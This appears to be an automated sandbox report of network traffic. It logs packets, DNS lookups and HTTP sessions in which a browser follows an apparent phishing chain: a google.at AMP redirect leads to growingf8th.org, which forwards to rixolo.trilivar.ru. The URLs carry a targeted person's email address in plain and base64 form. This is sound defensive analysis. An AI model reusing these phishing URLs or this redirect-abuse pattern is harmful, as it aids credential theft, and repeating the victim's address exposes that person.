                                          Jan 8, 2025 16:13:33.740858078 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.740858078 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.740883112 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.740914106 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.740931034 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.741381884 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.741415024 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.741442919 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.741451979 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.741482019 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.790623903 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.790684938 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829277039 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829319954 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829413891 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.829447031 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829520941 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829557896 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829590082 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.829595089 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829606056 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829626083 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.829677105 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829701900 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.829710007 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.829756975 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:33.831875086 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.831875086 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:33.851713896 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:33.851758003 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:33.855856895 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:33.856101990 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:33.856117010 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:34.133395910 CET49746443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:34.133423090 CET44349746104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:34.327577114 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:34.328124046 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:34.328154087 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:34.328504086 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:34.329132080 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:34.329132080 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:34.329274893 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:34.369071007 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:34.494340897 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:34.494421005 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:34.494503021 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:34.495182037 CET49749443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:34.495206118 CET44349749104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:38.396956921 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.396996975 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:38.397083998 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.397679090 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.397689104 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:38.851264954 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:38.851567030 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.851578951 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:38.851927042 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:38.852251053 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.852318048 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:38.852556944 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.852638960 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.852669001 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:38.852754116 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:38.852777958 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.119833946 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.119915962 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.119954109 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.119963884 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:39.119982004 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.120021105 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.120022058 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:39.120033026 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.120083094 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:39.120088100 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.120140076 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:39.121676922 CET49773443192.168.2.5104.18.94.41
                                          Jan 8, 2025 16:13:39.121689081 CET44349773104.18.94.41192.168.2.5
                                          Jan 8, 2025 16:13:39.130222082 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.130261898 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.130343914 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.130593061 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.130609989 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.582443953 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.582712889 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.582720995 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.583070040 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.583400011 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.583467007 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.583523035 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.627336979 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.708107948 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.708174944 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:13:39.708231926 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.708596945 CET49778443192.168.2.5104.18.95.41
                                          Jan 8, 2025 16:13:39.708610058 CET44349778104.18.95.41192.168.2.5
                                          Jan 8, 2025 16:14:21.714308023 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:21.714346886 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:21.714416027 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:21.714693069 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:21.714704990 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:22.360820055 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:22.361144066 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:22.361156940 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:22.361665964 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:22.361999989 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:22.362071037 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:22.416250944 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:32.258646011 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:32.258708000 CET44350019142.250.186.100192.168.2.5
                                          Jan 8, 2025 16:14:32.258936882 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:33.542722940 CET50019443192.168.2.5142.250.186.100
                                          Jan 8, 2025 16:14:33.542742968 CET44350019142.250.186.100192.168.2.5
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 8, 2025 16:13:17.018239975 CET53499101.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:17.047075987 CET53621471.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:18.068205118 CET53500071.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:21.651551962 CET5381253192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:21.651701927 CET6195753192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:21.658329010 CET53619571.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:21.659296036 CET53538121.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:22.205811024 CET4981053192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:22.206233978 CET6005853192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:22.212424040 CET53498101.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:22.213265896 CET53600581.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:23.640750885 CET5230553192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:23.641098022 CET5316953192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:23.658891916 CET53523051.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:23.764455080 CET53531691.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:24.345103979 CET5357853192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:24.345273018 CET5020353192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:24.393291950 CET53535781.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:24.393435955 CET53502031.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:26.206125975 CET6440753192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:26.209252119 CET6369653192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:26.209829092 CET5986053192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:26.210362911 CET5106553192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:26.213320971 CET53644071.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:26.216171026 CET53636961.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:26.216950893 CET53598601.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:26.216964006 CET53510651.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:26.954802036 CET5670453192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:26.955012083 CET5285553192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:26.961502075 CET53567041.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:26.961553097 CET53528551.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:27.568509102 CET6217353192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:27.568702936 CET5518753192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:27.575501919 CET53551871.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:27.576320887 CET53621731.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:27.583254099 CET5550053192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:27.584928036 CET6174453192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:27.590099096 CET53555001.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:27.592642069 CET53617441.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:27.592937946 CET53596941.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:29.428097010 CET5169053192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:29.428271055 CET4973253192.168.2.51.1.1.1
                                          Jan 8, 2025 16:13:29.435631037 CET53516901.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:29.436193943 CET53497321.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:35.127090931 CET53611101.1.1.1192.168.2.5
                                          Jan 8, 2025 16:13:53.986149073 CET53534971.1.1.1192.168.2.5
                                          Jan 8, 2025 16:14:16.832156897 CET53578271.1.1.1192.168.2.5
                                          Jan 8, 2025 16:14:16.956667900 CET53646331.1.1.1192.168.2.5
                                          TimestampSource IPDest IPChecksumCodeType
                                          Jan 8, 2025 16:13:23.764550924 CET192.168.2.51.1.1.1c22d(Port unreachable)Destination Unreachable
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 8, 2025 16:13:21.651551962 CET192.168.2.51.1.1.10x97baStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:21.651701927 CET192.168.2.51.1.1.10x712aStandard query (0)www.google.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:22.205811024 CET192.168.2.51.1.1.10xf144Standard query (0)www.google.atA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:22.206233978 CET192.168.2.51.1.1.10xad85Standard query (0)www.google.at65IN (0x0001)false
                                          Jan 8, 2025 16:13:23.640750885 CET192.168.2.51.1.1.10x37deStandard query (0)growingf8th.orgA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:23.641098022 CET192.168.2.51.1.1.10xe671Standard query (0)growingf8th.org65IN (0x0001)false
                                          Jan 8, 2025 16:13:24.345103979 CET192.168.2.51.1.1.10x78fcStandard query (0)rixolo.trilivar.ruA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:24.345273018 CET192.168.2.51.1.1.10x4bf9Standard query (0)rixolo.trilivar.ru65IN (0x0001)false
                                          Jan 8, 2025 16:13:26.206125975 CET192.168.2.51.1.1.10xae0dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.209252119 CET192.168.2.51.1.1.10xc45cStandard query (0)code.jquery.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:26.209829092 CET192.168.2.51.1.1.10x5be9Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.210362911 CET192.168.2.51.1.1.10x9a3fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:26.954802036 CET192.168.2.51.1.1.10xc25aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.955012083 CET192.168.2.51.1.1.10xfc35Standard query (0)code.jquery.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:27.568509102 CET192.168.2.51.1.1.10xcb3aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:27.568702936 CET192.168.2.51.1.1.10x7da3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:27.583254099 CET192.168.2.51.1.1.10x64e3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:27.584928036 CET192.168.2.51.1.1.10xcf20Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:29.428097010 CET192.168.2.51.1.1.10x58c9Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:29.428271055 CET192.168.2.51.1.1.10x7a8dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 8, 2025 16:13:21.658329010 CET1.1.1.1192.168.2.50x712aNo error (0)www.google.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:21.659296036 CET1.1.1.1192.168.2.50x97baNo error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:22.212424040 CET1.1.1.1192.168.2.50xf144No error (0)www.google.at216.58.206.67A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:23.658891916 CET1.1.1.1192.168.2.50x37deNo error (0)growingf8th.org103.83.194.55A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:24.393291950 CET1.1.1.1192.168.2.50x78fcNo error (0)rixolo.trilivar.ru104.21.33.3A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:24.393291950 CET1.1.1.1192.168.2.50x78fcNo error (0)rixolo.trilivar.ru172.67.188.103A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:24.393435955 CET1.1.1.1192.168.2.50x4bf9No error (0)rixolo.trilivar.ru65IN (0x0001)false
                                          Jan 8, 2025 16:13:26.213320971 CET1.1.1.1192.168.2.50xae0dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.213320971 CET1.1.1.1192.168.2.50xae0dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.213320971 CET1.1.1.1192.168.2.50xae0dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.213320971 CET1.1.1.1192.168.2.50xae0dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.216950893 CET1.1.1.1192.168.2.50x5be9No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.216950893 CET1.1.1.1192.168.2.50x5be9No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.216964006 CET1.1.1.1192.168.2.50x9a3fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:26.961502075 CET1.1.1.1192.168.2.50xc25aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.961502075 CET1.1.1.1192.168.2.50xc25aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.961502075 CET1.1.1.1192.168.2.50xc25aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:26.961502075 CET1.1.1.1192.168.2.50xc25aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:27.575501919 CET1.1.1.1192.168.2.50x7da3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:27.576320887 CET1.1.1.1192.168.2.50xcb3aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:27.576320887 CET1.1.1.1192.168.2.50xcb3aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:27.590099096 CET1.1.1.1192.168.2.50x64e3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:27.590099096 CET1.1.1.1192.168.2.50x64e3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                          Jan 8, 2025 16:13:27.592642069 CET1.1.1.1192.168.2.50xcf20No error (0)challenges.cloudflare.com65IN (0x0001)false
                                          Jan 8, 2025 16:13:29.435631037 CET1.1.1.1192.168.2.50x58c9No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                          • www.google.at
                                          • growingf8th.org
                                            • rixolo.trilivar.ru
                                          • https:
                                            • code.jquery.com
                                            • challenges.cloudflare.com
                                          • a.nel.cloudflare.com
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549716103.83.194.55803092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 8, 2025 16:13:23.673026085 CET509OUTGET /t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20= HTTP/1.1
                                          Host: growingf8th.org
                                          Connection: keep-alive
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Encoding: gzip, deflate
                                          Accept-Language: en-US,en;q=0.9
                                          Jan 8, 2025 16:13:24.273899078 CET269INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:24 GMT
                                          Server: Apache
                                          refresh: 0;url=https://rixolo.trilivar.ru/mwAdur/#Wpate.rowell@cherokeebrick.com
                                          Content-Length: 0
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Jan 8, 2025 16:13:24.346251011 CET453OUTGET /favicon.ico HTTP/1.1
                                          Host: growingf8th.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Referer: http://growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=
                                          Accept-Encoding: gzip, deflate
                                          Accept-Language: en-US,en;q=0.9
                                          Jan 8, 2025 16:13:24.518728971 CET515INHTTP/1.1 404 Not Found
                                          Date: Wed, 08 Jan 2025 15:13:24 GMT
                                          Server: Apache
                                          Content-Length: 315
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549713216.58.206.674433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:22 UTC1016OUTGET /url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20= HTTP/1.1
                                          Host: www.google.at
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-User: ?1
                                          Sec-Fetch-Dest: document
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:23 UTC1079INHTTP/1.1 302 Found
                                          Location: https://www.google.at/amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=
                                          Cache-Control: private
                                          Content-Type: text/html; charset=UTF-8
                                          Strict-Transport-Security: max-age=31536000
                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-CTKIWYH2TD1vU46zYvogrQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                          Permissions-Policy: unload=()
                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                          Date: Wed, 08 Jan 2025 15:13:23 GMT
                                          Server: gws
                                          Content-Length: 318
                                          X-XSS-Protection: 0
                                          Set-Cookie: NID=520=hgrMPCeFRKrCHnp1FKVMIVDcsy3rTAxBRPaPGughuS2uPXcxbDeM1fTLSnui4ttTuVBkfFc50RyHL4Tkua9kjpGAD2Q-gcMQESveF-0djBxXu85thCymyN-7vGw2UDBUCbD0g7ZzfDFkerXeHq52qw5tAs4Q0KCZ3gwCZfQeVPdN-0HKeYjgDipFAoTJjBIHopsy; expires=Thu, 10-Jul-2025 15:13:23 GMT; path=/; domain=.google.at; Secure; HttpOnly; SameSite=none
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close
                                          2025-01-08 15:13:23 UTC311INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 61 74 2f 61 6d 70 2f 67 72 6f 77 69 6e 67 66 38 74 68 2e 6f 72 67 2f 74 32 64 6f 6c 61 6c 72 77 65 2f 79 4e 52 4d 52 34 41 55 53 36 5a 79 58 4b 49 6c 62 6d 75 59 46 5a 38 50 59 6f 6c 2f 63 47 46 30 5a 53
                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.at/amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS
                                          2025-01-08 15:13:23 UTC7INData Raw: 48 54 4d 4c 3e 0d 0a
